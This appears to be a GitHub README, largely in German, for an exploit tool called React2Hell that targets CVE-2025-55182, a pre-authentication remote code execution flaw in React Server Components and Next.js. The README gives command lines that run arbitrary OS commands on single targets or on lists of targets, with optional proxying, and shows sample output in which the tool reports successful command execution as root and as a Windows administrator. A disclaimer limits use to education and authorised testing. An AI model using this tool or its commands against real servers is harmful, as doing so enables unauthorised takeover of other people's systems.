
CVE-2025-55182-advanced-scanner
@#React2Hell — CVE-2025-55182 Exploit
🔥 Next.js / React Server Remote Code Execution (RCE) Exploit
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Sicherheitstest-Dienstprogramm 🚀
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell ist ein leistungsstarkes Exploitation-Tool, das zum Testen und Ausnutzen von CVE-2025-55182 entwickelt wurde, einer kritischen Remote Code Execution-Sicherheitslücke, die Next.js & React Server Actions betrifft.
Eine Pre-Authentication Remote Code Execution-Sicherheitslücke existiert in React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0 einschließlich der folgenden Pakete: react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack. Der anfällige Code deserialisiert unsicher Nutzlasten aus HTTP-Anfragen an Server Function-Endpunkte.
python Scanner.py -u https://target.com -c "whoami"
python Scanner.py -l urls.txt -c "whoami"
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Sicherheitstest-Dienstprogramm 🚀
════════════════════════════════════════════════════════════════════════
[+] 3 Ziele geladen
════════════════════════════════════════════════════════════════════════
[→] Ziel: http://evil.com:3113/
[→] Ausführung: whoami
[✓] VERWUNDBAR — RCE erfolgreich!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Ziel: http://example.lab:2000/
[→] Ausführung: whoami
[✗] Nicht verwundbar — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Ziel: https://tale.lab:3000/
[→] Ausführung: whoami
[✓] VERWUNDBAR — RCE erfolgreich!
------------------------------------------------------------
win-1fl835ovldc\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan abgeschlossen — Verwundbar: 2
PS D:\Ankitspandey07\React2Hell>
Dieses Tool wurde ausschließlich zu Bildungs- und Sicherheitsforschungszwecken erstellt. Verwenden Sie es nicht auf Systemen ohne ausdrückliche Genehmigung. Sie sind für Ihre eigenen Handlungen verantwortlich.
Wenn dieser Exploit Ihnen geholfen hat, hinterlassen Sie bitte einen ⭐ auf GitHub ❤️
Ankit Pandey; GitHub: https://github.com/Ankitspandey07
Erstellt mit 🔥 von jemandem, der ein stolzer und leidenschaftlicher Pentester ist und bei jedem Schritt danach strebt, zu lernen.